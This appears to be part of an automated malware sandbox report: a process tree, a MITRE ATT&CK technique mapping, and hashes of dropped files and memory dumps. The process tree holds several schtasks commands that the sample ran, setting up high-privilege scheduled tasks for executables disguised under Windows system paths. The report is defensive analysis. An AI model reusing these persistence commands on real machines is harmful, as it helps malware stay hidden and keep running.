C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Windows\Performance\WinSAT\DataStore\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Windows\AppReadiness\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\AppReadiness\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Windows\AppReadiness\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4400

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3420

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\Lang\SearchApp.exe

Filesize
2.2MB

MD5
59b9f54f927431d2cf31d3aa202a0843

SHA1
b23d214605133dc8e930f9a9d473c7c7622b4b56

SHA256
007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594

SHA512
89106822646d8d412d5c956fd01ad37e4b1f34599497f8e362262f82d2d47f4460632019d6ec09da58c45d690ebd03f2812d5809743203be081702680bfb28f8

Download Submit
C:\Program Files\7-Zip\Lang\SearchApp.exe

Filesize
2.2MB

MD5
cfdd45a28360a9ffc595e2992dda30e9

SHA1
44941f2267400bd7be8505ae342da80173ba82ac

SHA256
d1571df97e3cf4ee568d8714f7d847f67ce1e0a8bf240032485b7c7d3d5f846b

SHA512
0d6797f2727c7fd24f3b06b80c3798cf3305b547448ab21f249664c3e28d850b3c37c644cc0ee5eefa89ac3ebbffc833b8b57e751d752ecb598adffd07ffacf6

Download Submit
C:\Program Files\Microsoft Office\PackageManifests\OfficeClickToRun.exe

Filesize
2.2MB

MD5
b5575baa0ffd860081158b27240d3450

SHA1
df49e976d895dbb9e276d66cb8f0ed2f746847bf

SHA256
f0493df19dfcb78d90b34bd42d9f3aa602dc779b0469cb5fbf3693791c3dc769

SHA512
2691b525c77aff4f53e769d6d677a82818507221e5ca73c051479bd6529bc8c6566f23087ddbdeb11e94d2a5282230ca4be9e0d5fe08d2d4765dbb40f30102d2

Download Submit
C:\ProgramData\RCX8C8.tmp

Filesize
2.2MB

MD5
54b48d7611fb49892fd9f36e6c9eb58c

SHA1
ca6e1ff091ea3624afd344751886e9b4e655a6f3

SHA256
f8fd70996226e10c0e26187249fc0e156c5d5141f6db19e2cf070b75d0e800c8

SHA512
52312fb241f9c9a3e1978e64127e574e35130b052081ead8eeb3bc9361825738cab14d172e3651effc7b97615cfec9ca565726decb3b721c1754c4f7a84ae754

Download Submit
C:\Recovery\WindowsRE\winlogon.exe

Filesize
2.2MB

MD5
ea3f6cbbeb0869d66ddf97da95a26f80

SHA1
5c7f76022ed33e6125a2de41de10793d4bbe6f77

SHA256
aa41d6d56b20204cd1b973a6943d20b7c5bae79cb11020bcf9e830cde7086ac5

SHA512
c4a2fd40881f4f6ef81705c33af9c57e7b0f5976c560f9cdcd4d7b05c1958e1411a463983ab2fb601cf0b7b08798853e34fc3cb2c137379e76ccbc8c8119a92b

Download Submit
C:\Users\Admin\AppData\Local\Temp\6b27a1db-8adc-4e29-80bd-8678f793ab30.vbs

Filesize
746B

MD5
718f9566dc70d21a12a0d7ba748bd360

SHA1
48a8ce3529cd3798d5698fa991dca0031f672758

SHA256
41280cbb169f7bacd3d1bfba3863b070666dafc4b91003190ad8f2df32ebcd14

SHA512
728645def98231694b7af46238cafe6f8ef15865a91492cd220c3b01d17d48490d1a1f7daba15e851cc9149be83441787401298fde27a2851ba1768def7d6bce

Download Submit
C:\Users\Admin\AppData\Local\Temp\f682d0a2-a8f8-4b9d-b5fd-d4ab878190ec.vbs

Filesize
523B

MD5
97d1d74c670a704657ec4be4f7b605d4

SHA1
faa76f8b7700da49747c41924f55f726fe342b4d

SHA256
8e39a3a6c41c4416f6db4d93bf43e5a9bc9db2a8220f081f6e4560ab4d7628f1

SHA512
6d4ffcee7ad0cac2bf300e52e1055647b34fa24b10db552c5e92aa068d57d9ff58599eebd20e41fc23b44d99db96935195246fd2d100b53588127ffff8c5e3e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\fx2jfj43P9.bat

Filesize
236B

MD5
f0696974e4dbf040b4be85e498b3919c

SHA1
f89aacd4abb21327ef33eac4a72c3a3f5610007d

SHA256
29c4df48932400ef1100471efa4a14d2111f16e05d26c2530e46042a43eea5c4

SHA512
efecb4ccb1f200bff57e40cef1344e6425899ab2a30fe2d9f03cff93185f9591757ed4b95c4aade66038739221629fe7ba717ac56b79cbb204bf19ad3285b740

Download Submit
memory/772-255-0x000000001DA10000-0x000000001DBD2000-memory.dmp

Filesize
1.8MB

Download
memory/772-245-0x00000000001F0000-0x000000000041E000-memory.dmp

Filesize
2.2MB

Download
memory/4888-11-0x000000001B980000-0x000000001B988000-memory.dmp

Filesize
32KB

Download
memory/4888-25-0x000000001BD20000-0x000000001BD2E000-memory.dmp

Filesize
56KB

Download
memory/4888-12-0x000000001B990000-0x000000001B9A0000-memory.dmp

Filesize
64KB

Download
memory/4888-13-0x000000001B9F0000-0x000000001B9FA000-memory.dmp

Filesize
40KB

Download
memory/4888-14-0x000000001BA00000-0x000000001BA0C000-memory.dmp

Filesize
48KB

Download
memory/4888-15-0x000000001BA10000-0x000000001BA18000-memory.dmp

Filesize
32KB

Download
memory/4888-16-0x000000001BA20000-0x000000001BA2C000-memory.dmp

Filesize
48KB

Download
memory/4888-17-0x000000001BA30000-0x000000001BA38000-memory.dmp

Filesize
32KB

Download
memory/4888-19-0x000000001BA40000-0x000000001BA52000-memory.dmp

Filesize
72KB

Download
memory/4888-20-0x000000001BFA0000-0x000000001C4C8000-memory.dmp

Filesize
5.2MB

Download
memory/4888-21-0x000000001BA70000-0x000000001BA7C000-memory.dmp

Filesize
48KB

Download
memory/4888-22-0x000000001BA80000-0x000000001BA8C000-memory.dmp

Filesize
48KB

Download
memory/4888-23-0x000000001BA90000-0x000000001BA9C000-memory.dmp

Filesize
48KB

Download
memory/4888-26-0x000000001BBA0000-0x000000001BBA8000-memory.dmp

Filesize
32KB

Download
memory/4888-27-0x000000001BBB0000-0x000000001BBBE000-memory.dmp

Filesize
56KB

Download
memory/4888-28-0x000000001BBC0000-0x000000001BBCC000-memory.dmp

Filesize
48KB

Download
memory/4888-24-0x000000001BD10000-0x000000001BD1A000-memory.dmp

Filesize
40KB

Download
memory/4888-30-0x000000001BCE0000-0x000000001BCEC000-memory.dmp

Filesize
48KB

Download
memory/4888-29-0x000000001BCD0000-0x000000001BCD8000-memory.dmp

Filesize
32KB

Download
memory/4888-0-0x00007FFB253C3000-0x00007FFB253C5000-memory.dmp

Filesize
8KB

Download
memory/4888-33-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download
memory/4888-34-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download
memory/4888-9-0x000000001B950000-0x000000001B966000-memory.dmp

Filesize
88KB

Download
memory/4888-10-0x000000001B970000-0x000000001B97C000-memory.dmp

Filesize
48KB

Download
memory/4888-8-0x0000000002960000-0x0000000002970000-memory.dmp

Filesize
64KB

Download
memory/4888-147-0x00007FFB253C3000-0x00007FFB253C5000-memory.dmp

Filesize
8KB

Download
memory/4888-166-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download
memory/4888-7-0x0000000002950000-0x0000000002958000-memory.dmp

Filesize
32KB

Download
memory/4888-184-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download
memory/4888-233-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download
memory/4888-240-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download
memory/4888-6-0x000000001B9A0000-0x000000001B9F0000-memory.dmp

Filesize
320KB

Download
memory/4888-5-0x0000000002930000-0x000000000294C000-memory.dmp

Filesize
112KB

Download
memory/4888-4-0x0000000002910000-0x000000000291E000-memory.dmp

Filesize
56KB

Download
memory/4888-3-0x0000000000F10000-0x0000000000F1E000-memory.dmp

Filesize
56KB

Download
memory/4888-2-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download
memory/4888-1-0x00000000004B0000-0x00000000006DE000-memory.dmp

Filesize
2.2MB

Download